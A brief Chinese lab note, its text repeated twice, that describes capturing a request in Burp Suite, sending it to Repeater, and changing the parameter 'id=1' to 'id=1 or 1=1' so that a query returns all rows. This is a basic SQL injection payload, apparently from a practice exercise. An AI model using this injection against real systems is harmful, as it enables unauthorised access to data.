1. 用burp抓包
2. Send to Repeater
3. 将 id=1&submit=%E6%9F%A5%E8%AF%A2 改为
id=1 or 1=1 &submit=%E6%9F%A5%E8%AF%A2
4. 即可查询数据
1. 用burp抓包
2. Send to Repeater
3. 将 id=1&submit=%E6%9F%A5%E8%AF%A2 改为
id=1 or 1=1 &submit=%E6%9F%A5%E8%AF%A2
4. 即可查询数据